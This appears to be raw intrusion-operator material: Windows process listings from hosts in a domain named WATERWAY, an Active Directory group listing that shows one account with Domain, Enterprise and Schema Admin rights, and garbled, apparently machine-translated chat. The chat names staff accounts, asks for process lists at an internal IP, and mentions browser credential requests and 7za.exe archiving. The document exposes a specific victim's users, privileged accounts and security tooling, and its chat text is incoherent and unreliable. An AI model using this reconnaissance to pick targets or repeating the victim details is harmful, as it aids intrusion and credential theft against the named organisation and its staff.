KiteService.exe 5728 Services 0 29,228 K NT AUTHORITY\SYSTEM 0:00:00
IpOverUsbSvc.exe 5748 Services 0 12,316 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5760 Services 0 8,816 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5772 Services 0 12,832 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 5780 Services 0 5,412 K NT AUTHORITY\SYSTEM 0:00:00
erlsrv.exe 5792 Services 0 3,472 K NT AUTHORITY\SYSTEM 0:00:00
sqlwriter.exe 5800 Services 0 7,788 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtAudioService.exe 5808 Services 0 7,924 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5828 Services 0 10,188 K NT AUTHORITY\SYSTEM 0:00:00
RedGate.Client.Service.ex 5820 Services 0 56,536 K NT AUTHORITY\SYSTEM 0:00:06
cygrunsrv.exe 5844 Services 0 5,784 K NT AUTHORITY\SYSTEM 0:00:00
cygrunsrv.exe 5856 Services 0 5,800 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5888 Services 0 18,580 K NT AUTHORITY\SYSTEM 0:00:00
agent.exe 5912 Services 0 148,340 K NT AUTHORITY\SYSTEM 0:01:22
svchost.exe 5928 Services 0 5,912 K NT AUTHORITY\LOCAL SERVICE 0:00:00
cygrunsrv.exe 5936 Services 0 5,752 K NT AUTHORITY\SYSTEM 0:00:00
nvcontainer.exe 5952 Services 0 31,552 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 6040 Services 0 5,600 K NT AUTHORITY\LOCAL SERVICE 0:00:00
erl.exe 6112 Services 0 23,400 K NT AUTHORITY\SYSTEM 0:03:59
fbserver.exe 6232 Services 0 6,712 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 6248 Services 0 5,312 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 6404 Services 0 7,052 K NT AUTHORITY/NETWORK SERVICE 0:00:00
MSOIDSVCM.EXE 6772 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 6880 Services 0 6,880 K NT AUTHORITY\LOCAL SERVICE 0:00:01
cygrunsrv.exe 6968 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00
cygrunsrv.exe 7100 Services 0 7,120 K NT AUTHORITY\SYSTEM 0:00:00
epmd.exe 7284 Services 0 3,492 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 7316 Services 0 12,360 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 7408 Services 0 6,956 K NT AUTHORITY\NETWORK SERVICE 0:00:00
sqlservr.exe 7656 Services 0 243,216 K NT SERVICE\MSSQLSERVER 0:09:42
unsecapp.exe 7716 Services 0 6,536 K NT AUTHORITY\SYSTEM 0:00:00
sqlceip.exe 7820 Services 0 41,456 K NT SERVICE\SQLTELEMETRY 0:00:02
conhost.exe 8448 Services 0 7,544 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 8516 Services 0 7,384 K NT AUTHORITY\SYSTEM 0:00:00
alprlink.exe 8636 Services 0 17,492 K NT AUTHORITY\SYSTEM 0:00:00
alprd.exe 8704 Services 0 196,332 K NT AUTHORITY\SYSTEM 0:00:08
conhost.exe 8816 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00
beanstalkd.exe 8912 Services 0 5,364 K NT AUTHORITY\SYSTEM 0:00:01
rundll32.exe 8924 Console 1 6,580 K NT AUTHORITY\SYSTEM 0:00:00
NVDisplay.Container.exe 8292 Console 1 37,580 K NT AUTHORITY\SYSTEM 0:00:04
WmiPrvSE.exe 8264 Services 0 54,308 K NT AUTHORITY\SYSTEM 0:00:18
svchost.exe 9464 Services 0 8,284 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 10772 Services 0 15,412 K NT AUTHORITY/NETWORK SERVICE 0:00:05
svchost.exe 10896 Services 0 10,804 K NT AUTHORITY\SYSTEM 0:00:03
NableSixtyFourBitManager.    11368 Services 0 23,952 K NT AUTHORITY\SYSTEM 0:00:41
conhost.exe 11376 Services 0 4,756 K NT AUTHORITY\SYSTEM 0:00:00
NableReactiveManagement.e 11408 Services 0 32,052 K NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 11420 Services 0 4,760 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 11636 Services 0 13,736 K NT AUTHORITY\SYSTEM 0:00:00
fdlauncher.exe 11784 Services 0 4,376 K NT SERVICE\MSSQLFDLauncher 0:00:00
Launchpad.exe 11792 Services 0 16,268 K NT SERVICE\MSSQLLaunchpad 0:00:00
fdhost.exe 11868 Services 0 6,328 K NT SERVICE\MSSQLFDLauncher 0:00:00
conhost.exe 11876 Services 0 4,672 K NT SERVICE\MSSQLFDLauncher 0:00:00
win32sysinfo.exe 12240 Services 0 2,348 K NT AUTHORITY\SYSTEM 0:00:00
inet_gethethost.exe 5332 Services 0 4,584 K NT AUTHORITY\SYSTEM 0:00:00
SolarWinds.MSP.CacheServi 13132 Services 0 37,972 K NT AUTHORITY\LOCAL SERVICE 0:00:03
SolarWinds.MSP.RpcServerS 13244 Services 0 48,160 K NT AUTHORITY\SYSTEM 0:00:06
dllhost.exe 12684 Services 0 10,632 K NT AUTHORITY\SYSTEM 0:00:00
fmplugin.exe 9848 Services 0 28,400 K NT AUTHORITY\SYSTEM 0:00:13
conhost.exe 9832 Services 0 7,776 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 1304 RDP-Tcp#2 2 6,464 K NT AUTHORITY\SYSTEM 0:00:16
winlogon.exe 1532 RDP-Tcp#2 2 2 9,268 K NT AUTHORITY\SYSTEM 0:00:00
WUDFHost.exe 2220 Services 0 68,012 K NT AUTHORITY\LOCAL SERVICE 0:03:59
fontdrvhost.exe 2744 RDP-Tcp#2 2 8,708 K Font Driver Host\UMFD-2 0:00:01
dwm.exe 4320 RDP-Tcp#2 2 87,008 K Window Manager\DWM-2 0:01:17
NVDisplay.Container.exe 5576 RDP-Tcp#2 2 2 50,612 K NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 6276 Services 0 7,112 K NT AUTHORITY\SYSTEM 0:00:00
EPConsole.exe 11732 RDP-Tcp#2 2 1,220 K WATERWAY\mapusatera 0:00:03
rdpclip.exe 3540 RDP-Tcp#2 2 11,648 K WATERWAY\mapusatera 0:00:11
nvcontainer.exe 11124 RDP-Tcp#2 2 23,532 K WATERWAY\mapusatera 0:00:02
sihost.exe 4508 RDP-Tcp#2 2 26,852 K WATERWAY\mapusatera 0:00:04
nvcontainer.exe 3140 RDP-Tcp#2 2 38,620 K WATERWAY\mapusatera 0:00:55
svchost.exe 11080 RDP-Tcp#2 2 26,112 K WATERWAY\mapusatera 0:00:44
svchost.exe 5672 RDP-Tcp#2 2 25,728 K WATERWAY\mapusatera 0:00:01
svchost.exe 12848 Services 0 20,636 K NT AUTHORITY\SYSTEM 0:00:01
taskhostw.exe 6836 RDP-Tcp#2 2 21,608 K WATERWAY\mapusatera 0:00:03
svchost.exe 8544 Services 0 7,808 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 11900 Services 0 18,716 K NT AUTHORITY\LOCAL SERVICE 0:00:00
ctfmon.exe 1768 RDP-Tcp#2 2 28,616 K WATERWAY\mapusatera 0:00:42
explorer.exe 13472 RDP-Tcp#2 2 175,424 K WATERWAY\mapusatera 0:01:37
NVIDIA Web Helper.exe 13484 RDP-Tcp#2 2 12,100 K WATERWAY\mapusatera 0:00:02
conhost.exe 13556 RDP-Tcp#2 2 2 1,268 K WATERWAY\mapusatera 0:00:00
svchost.exe 13708 RDP-Tcp#2 2 23,276 K WATERWAY\mapusatera 0:00:01
GoogleCrashHandler.exe 13812 Services 0 1,256 K NT AUTHORITY\SYSTEM 0:00:00
GoogleCrashHandler64.exe 13900 Services 0 1,296 K NT AUTHORITY\SYSTEM 0:00:00
StartMenuExperienceHost.e 13456 RDP-Tcp#2 2 60,176 K WATERWAY\mapusatera 0:00:01
RuntimeBroker.exe 13824 RDP-Tcp#2 2 24,052 K WATERWAY\mapusatera 0:00:00
SearchApp.exe 14232 RDP-Tcp#2 2 2 89,900 K WATERWAY\mapusatera 0:00:10
RuntimeBroker.exe 14348 RDP-Tcp#2 2 36,724 K WATERWAY\mapusatera 0:00:02
YourPhone.exe 14588 RDP-Tcp#2 2 6,244 K WATERWAY\mapusatera 0:00:00
svchost.exe 15044 Services 0 11,672 K NT AUTHORITY\SYSTEM 0:00:00
RuntimeBroker.exe 5240 RDP-Tcp#2 2 14,200 K WATERWAY\mapusatera 0:00:00
nvsphelper64.exe 15008 RDP-Tcp#2 2 11,572 K WATERWAY\mapusatera 0:00:00
NVIDIA Share.exe 15216 RDP-Tcp#2 2 44,948 K WATERWAY\mapusatera 0:00:05
NVIDIA Share.exe 15424 RDP-Tcp#2 2 29,452 K WATERWAY\mapusatera 0:00:00
NVIDIA Share.exe 15540 RDP-Tcp#2 2 2 50,808 K WATERWAY\mapusatera 0:00:01
SecurityHealthSystray.exe 16052 RDP-Tcp#2 2 9,176 K WATERWAY\mapusatera 0:00:00
SecurityHealthService.exe 16076 Services 0 12,740 K NT AUTHORITY\SYSTEM 0:00:00
NCentralRRDLdr.exe 16204 RDP-Tcp#2 2 11,012 K WATERWAY\mapusatera 0:00:00
RuntimeBroker.exe 16216 RDP-Tcp#2 2 23,284 K WATERWAY\mapusatera 0:00:03
NCentralRDViewer.exe 16256 RDP-Tcp#2 2 41,920 K WATERWAY\mapusatera 0:00:03
SgrmBroker.exe 14216 Services 0 8,856 K NT AUTHORITY\SYSTEM 0:00:02
SolarWinds.MSP.PME.Agent.     2288 Services 0 22,804 K NT AUTHORITY\SYSTEM 0:00:00
AgentMaint.exe 16328 Services 0 25,676 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 15380 Services 0 9,992 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 15616 RDP-Tcp#2 2 11,328 K WATERWAY\mapusatera 0:00:00
outlook.exe 15980 RDP-Tcp#2 2,340,144 K WATERWAY\mapusatera 0:05:42
chrome.exe 4656 RDP-Tcp#2 2,305,636 K WATERWAY\mapusatera 0:07:59
chrome.exe 13684 RDP-Tcp#2 2 6,852 K WATERWAY\mapusatera 0:00:00
chrome.exe 7272 RDP-Tcp#2 2 192,908 K WATERWAY\mapusatera 0:03:08
chrome.exe 15872 RDP-Tcp#2 2 73,628 K WATERWAY\mapusatera 0:01:53
chrome.exe 15140 RDP-Tcp#2 2 17,468 K WATERWAY\mapusatera 0:00:09
chrome.exe 13936 RDP-Tcp#2 2 67,464 K WATERWAY\mapusatera 0:00:15
chrome.exe 16380 RDP-Tcp#2 2 71,084 K WATERWAY\mapusatera 0:00:01
chrome.exe 15876 RDP-Tcp#2 2 132,800 K WATERWAY\mapusatera 0:00:55
chrome.exe 15948 RDP-Tcp#2 2 84,912 K WATERWAY\mapusatera 0:00:57
chrome.exe 15596 RDP-Tcp#2 2 2 71,180 K WATERWAY\mapusatera 0:00:11
TextInputHost.exe 16836 RDP-Tcp#2 2 43,968 K WATERWAY\mapusatera 0:00:03
chrome.exe 17156 RDP-Tcp#2 2 27,296 K WATERWAY\mapusatera 0:00:01
svchost.exe 17356 Services 0 9,956 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 17412 RDP-Tcp#2 2 2 56,608 K WATERWAY\mapusatera 0:00:13
chrome.exe 1800 RDP-Tcp#2 2 2 87,588 K WATERWAY\mapusatera 0:00:20
chrome.exe 18900 RDP-Tcp#2 2 2,172,060 K WATERWAY\mapusatera 0:00:21
chrome.exe 2452 RDP-Tcp#2 2 49,728 K WATERWAY\mapusatera 0:00:20
chrome.exe 16772 RDP-Tcp#2 2 206,988 K WATERWAY\mapusatera 0:02:34
chrome.exe 16792 RDP-Tcp#2 2,205,424 K WATERWAY\mapusatera 0:01:59
chrome.exe 16808 RDP-Tcp#2 2 177,120 K WATERWAY\mapusatera 0:01:14
chrome.exe 19496 RDP-Tcp#2 2 2 88,640 K WATERWAY\mapusatera 0:00:03
chrome.exe 16876 RDP-Tcp#2 2 2 82,568 K WATERWAY\mapusatera 0:00:20
chrome.exe 16396 RDP-Tcp#2 2 2 17,668 K WATERWAY\mapusatera 0:00:00
chrome.exe 6036 RDP-Tcp#2 2 2 45,264 K WATERWAY\mapusatera 0:00:01
NableAVDBridge.exe 17592 Services 0 31,432 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 20648 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00
AdobeNotificationClient.e 21140 RDP-Tcp#2 2 3,848 K WATERWAY\mapusatera 0:00:00
RuntimeBroker.exe 10348 RDP-Tcp#2 2 12,900 K WATERWAY\mapusatera 0:00:00
svchost.exe 23088 Services 0 6,772 K NT AUTHORITY\SYSTEM 0:00:00
VSSVC.exe 24408 Services 0 10,372 K NT AUTHORITY\SYSTEM 0:00:16
svchost.exe 22936 Services 0 8,864 K NT AUTHORITY\SYSTEM 0:00:18
UserOOBEBroker.exe 12744 RDP-Tcp#2 2 9,628 K WATERWAY\mapusatera 0:00:00
svchost.exe 20932 Services 0 21,140 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 21864 RDP-Tcp#2 2 225,636 K WATERWAY\mapusatera 0:00:29
chrome.exe 13324 RDP-Tcp#2 2,105,720 K WATERWAY\mapusatera 0:00:43
dllhost.exe 2232 RDP-Tcp#2 2 2 12,444 K WATERWAY\mapusatera 0:00:00
ApplicationFrameHost.exe 7964 RDP-Tcp#2 2 24,924 K WATERWAY\mapusatera 0:00:00
taskhostw.exe 25584 RDP-Tcp#2 2 18,996 K WATERWAY\mapusatera 0:00:00
iexplore.exe 25380 RDP-Tcp#2 2 2 31,936 K WATERWAY\mapusatera 0:00:00
iexplore.exe 8428 RDP-Tcp#2 2 2 15,788 K WATERWAY\mapusatera 0:00:01
chrome.exe 25160 RDP-Tcp#2 2 46,956 K WATERWAY\mapusatera 0:00:01
svchost.exe 20296 Services 0 6,696 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 12184 RDP-Tcp#2 2 176,704 K WATERWAY\mapusatera 0:01:30
chrome.exe 6468 RDP-Tcp#2 2,104,252 K WATERWAY\mapusatera 0:00:04
chrome.exe 21264 RDP-Tcp#2 2 52,912 K WATERWAY\mapusatera 0:00:00
chrome.exe 14704 RDP-Tcp#2 2 2 64,868 K WATERWAY\mapusatera 0:00:01
chrome.exe 18672 RDP-Tcp#2 2 64,892 K WATERWAY\mapusatera 0:00:02
chrome.exe 21156 RDP-Tcp#2 2 50,592 K WATERWAY\mapusatera 0:00:00
chrome.exe 24160 RDP-Tcp#2 2 96,412 K WATERWAY\mapusatera 0:00:03
chrome.exe 22756 RDP-Tcp#2 2 50,880 K WATERWAY\mapusatera 0:00:00
chrome.exe 8320 RDP-Tcp#2 2 2 88,032 K WATERWAY\mapusatera 0:00:02
chrome.exe 23780 RDP-Tcp#2 2 2 51,092 K WATERWAY\mapusatera 0:00:00
svchost.exe 18788 Services 0 15,468 K NT AUTHORITY\LOCAL SERVICE 0:00:00
SettingSyncHost.exe 25812 RDP-Tcp#2 2 6,176 K WATERWAY\mapusatera 0:00:00
svchost.exe 10760 Services 0 11,264 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 21536 Services 0 10,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 12976 Services 0 20,216 K NT AUTHORITY\SYSTEM 0:00:00
devenv.exe 21676 RDP-Tcp#2 2,505,908 K WATERWAY\mapusatera 0:00:40
PerfWatson2.exe 1648 RDP-Tcp#2 2 70,476 K WATERWAY\mapusatera 0:00:02
Microsoft.ServiceHub.Cont 3392 RDP-Tcp#2 2 57,436 K WATERWAY\mapusatera 0:00:01
conhost.exe 5328 RDP-Tcp#2 2 10,772 K WATERWAY\mapusatera 0:00:00
ServiceHub.VSDetouredHost 6328 RDP-Tcp#2 2 80,500 K WATERWAY\mapusatera 0:00:03
ServiceHub.IdentityHost.e 22516 RDP-Tcp#2 2 99,428 K WATERWAY\mapusatera 0:00:05
conhost.exe 23400 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00
conhost.exe 22260 RDP-Tcp#2 2 10,744 K WATERWAY\mapusatera 0:00:00
ServiceHub.SettingsHost.e 3612 RDP-Tcp#2 2 111,168 K WATERWAY\mapusatera 0:00:03
conhost.exe 23096 RDP-Tcp#2 2 2 10,772 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 3112 RDP-Tcp#2 2 62,536 K WATERWAY\mapusatera 0:00:01
conhost.exe 2992 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.RoslynCodeAnal 19432 RDP-Tcp#2 2 295,244 K WATERWAY\mapusatera 0:00:11
conhost.exe 19164 RDP-Tcp#2 2 10,752 K WATERWAY\mapusatera 0:00:00
ServiceHub.ThreadedWaitDi 18648 RDP-Tcp#2 2 71,792 K WATERWAY\mapusatera 0:00:02
conhost.exe 8992 RDP-Tcp#2 2 10,764 K WATERWAY\mapusatera 0:00:00
sqlservr.exe 2800 RDP-Tcp#2 2,381,244 K WATERWAY\mapusatera 0:00:10
ServiceHub.Host.CLR.x86.e 24636 RDP-Tcp#2 2 83,308 K WATERWAY\mapusatera 0:00:03
conhost.exe 24708 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00
ServiceHub.TestWindowStor 15700 RDP-Tcp#2 2 2 63,176 K WATERWAY\mapusatera 0:00:01
conhost.exe 10360 RDP-Tcp#2 2 2 10,776 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 20912 RDP-Tcp#2 2 63,996 K WATERWAY\mapusatera 0:00:01
conhost.exe 4388 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00
chrome.exe 22888 RDP-Tcp#2 2 120,740 K WATERWAY\mapusatera 0:00:12
chrome.exe 23436 RDP-Tcp#2 2,123,468 K WATERWAY\mapusatera 0:00:08
chrome.exe 23980 RDP-Tcp#2 2,101,556 K WATERWAY\mapusatera 0:00:03
chrome.exe 24536 RDP-Tcp#2 2 2 95,496 K WATERWAY\mapusatera 0:00:02
chrome.exe 18072 RDP-Tcp#2 2 2,424 K WATERWAY\mapusatera 0:00:04
devenv.exe 17440 RDP-Tcp#2 2 548,328 K WATERWAY\mapusatera 0:01:08
PerfWatson2.exe 19876 RDP-Tcp#2 2 66,292 K WATERWAY\mapusatera 0:00:01
Microsoft.ServiceHub.Cont 3400 RDP-Tcp#2 2 2 55,544 K WATERWAY\mapusatera 0:00:01
conhost.exe 3436 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.VSDetouredHost 24196 RDP-Tcp#2 2 80,520 K WATERWAY\mapusatera 0:00:03
ServiceHub.IdentityHost.e 17652 RDP-Tcp#2 2 96,368 K WATERWAY\mapusatera 0:00:05
conhost.exe 19700 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00
conhost.exe 13384 RDP-Tcp#2 2 10,740 K WATERWAY\mapusatera 0:00:00
ServiceHub.RoslynCodeAnal 14756 RDP-Tcp#2 2 271,108 K WATERWAY\mapusatera 0:00:07
conhost.exe 9688 RDP-Tcp#2 2 10,760 K WATERWAY\mapusatera 0:00:00
ServiceHub.ThreadedWaitDi 20588 RDP-Tcp#2 2 71,472 K WATERWAY\mapusatera 0:00:01
conhost.exe 8224 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 22956 RDP-Tcp#2 2 2 61,828 K WATERWAY\mapusatera 0:00:01
conhost.exe 13400 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
ServiceHub.SettingsHost.e 23348 RDP-Tcp#2 2 113,756 K WATERWAY\mapusatera 0:00:07
conhost.exe 25440 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 18560 RDP-Tcp#2 2 57,704 K WATERWAY\mapusatera 0:00:01
conhost.exe 11608 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
svchost.exe 26356 Services 0 7,628 K NT AUTHORITY\SYSTEM 0:00:00
ScriptedSandbox64.exe 4112 RDP-Tcp#2 2 43,492 K WATERWAY\mapusatera 0:00:00
WmiPrvSE.exe 23456 Services 0 15,020 K NT AUTHORITY\NETWORK SERVICE 0:00:04
chrome.exe 21960 RDP-Tcp#2 2 23,100 K WATERWAY\mapusatera 0:00:00

``Give me a list of processes192.168.0.164 I'd like to see his car,`` for now,`` I don't have a car in coba,`` have you looked exactly,`` I think the post office has looked at something else or his mail,``
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Senior Ops,OU=WWW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Hyper-V Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Schema Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Enterprise Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
Do you have it? mapusateraatam also not saved even on the rd went to someone I do not remember someone exactly had and the rest do not mention nimbla in the stories? even somharper or with blauer? with gkellera who do you work with?

 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 324 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 488 480 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 556,544 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 564 480 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 652 564 services.exe x64 0 NT AUTHORITY\SYSTEM
 292 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 10452 292 taskhostex.exe x64 2 WATERWAY\Administrator
 11364 292 taskhostex.exe x64 3 WATERWAY\gkeller
 356 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 500 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 784 652 ntfrs.exe x64 0 NT AUTHORITY\SYSTEM
 820 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9264 820 WmiPrvSE.exe x64 0 NT AUTHORITY/UNETWORK SERVICE
 12292 820 RuntimeBroker.exe x64 2 WATERWAY\Administrator
 864 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 992 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1124 652 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1248 652 ismserv.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1520 652 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 1548 652 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM
 1600 652 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM
 1632 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1648 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1668 652 dns.exe x64 0 NT AUTHORITY\SYSTEM
 1688 652 EPIntegrationService.exe x64 0 NT AUTHORITY\SYSTEM
 1820 652 EPProtectedService.exe x64 0 NT AUTHORITY\SYSTEM
 1900 652 bdredline.exe x64 0 NT AUTHORITY\SYSTEM
 1956 652 EPSecurityService.exe x64 0 NT AUTHORITY\SYSTEM
 10412 1956 EPConsole.exe x64 2 WATERWAY\Administrator
 11292 1956 EPConsole.exe x64 3 WATERWAY\gkeller
 2012 652 EPUpdateService.exe x64 0 NT AUTHORITY\SYSTEM
 2020 652 pg_ctl.exe x86 0 NT AUTHORITY\SYSTEM
 2300 2020 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2324 2300 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 2368 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2560 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2580 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 7248 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 7260 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 72882 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 7324 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8348 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8372 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8392 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8412 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8432 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8472 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8492 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8512 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8532 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8616 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 9952 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 10760 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 11244 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 11656 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2292 652 wbserver.exe x86 0 NT AUTHORITY\SYSTEM
 2424 652 wlcollector.exe x86 0 NT AUTHORITY\SYSTEM
 2444 652 apache.exe x86 0 NT AUTHORITY\SYSTEM
 2196 2444 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2516 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2680 2516 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2544 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2244 2544 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2592 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 1588 2592 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2632 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2604 2632 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2668 652 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM
 9540 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 10584 9540 rdpclip.exe x64 2 WATERWAY\Administrator
 11336 9540 rdpclip.exe x64 3 WATERWAY\gkeller
 9648 652 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 9696 652 vds.exe x64 0 NT AUTHORITY\SYSTEM
 9768 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9804 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9832 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9920 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 10020 652 VSSVC.exe x64 0 NT AUTHORITY\SYSTEM
 660 564 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 592 544 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 948 592 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
 1000 592 dwm.exe x64 1 Window Manager\DWM-1
 1464 1468 csrss.exe x64 2 NT AUTHORITY\SYSTEM
 1760 2972 csrss.exe x64 3 NT AUTHORITY\SYSTEM
 2756 2972 winlogon.exe x64 3 NT AUTHORITY\SYSTEM
 2788 2756 dwm.exe x64 3 Window Manager\DWM-3
 9308 1468 winlogon.exe x64 2 NT AUTHORITY\SYSTEM
 10276 9308 dwm.exe x64 2 Window Manager\DWM-2
 9708 10044 mstsc.exe x86 0 NT AUTHORITY\SYSTEM
 10652 10616 explorer.exe x64 2 WATERWAY\Administrator
 10968 10652 wsc.exe x86 2 WATERWAY\Administrator
 11200 10652 CCleaner64.exe x64 2 WATERWAY\Administrator
 12136 10652 chrome.exe x64 2 WATERWAY\Administrator
 2932 12136 chrome.exe x64 2 WATERWAY\Administrator
 9428 12136 chrome.exe x64 2 WATERWAY\Administrator
 11268 12136 chrome.exe x64 2 WATERWAY\Administrator
 11440 12136 chrome.exe x64 2 WATERWAY\Administrator
 11468 12136 chrome.exe x64 2 WATERWAY\Administrator
 12092 12136 chrome.exe x64 2 WATERWAY\Administrator
 11620 11560 explorer.exe x64 3 WATERWAY\gkeller
 9384 11620 wsc.exe x86 3 WATERWAY\gkeller
 12000 11388 ServerManager.exe x64 3 WATERWAY\gkeller
 12224 12000 mmc.exe x64 3 WATERWAY\gkeller
If request for credits from the browser and 7za.exe spam such processes, then maybe it's our doing?
 5244 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 5260 5252 explorer.exe x64 2 WATERWAY\Administrator
 5800 608 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
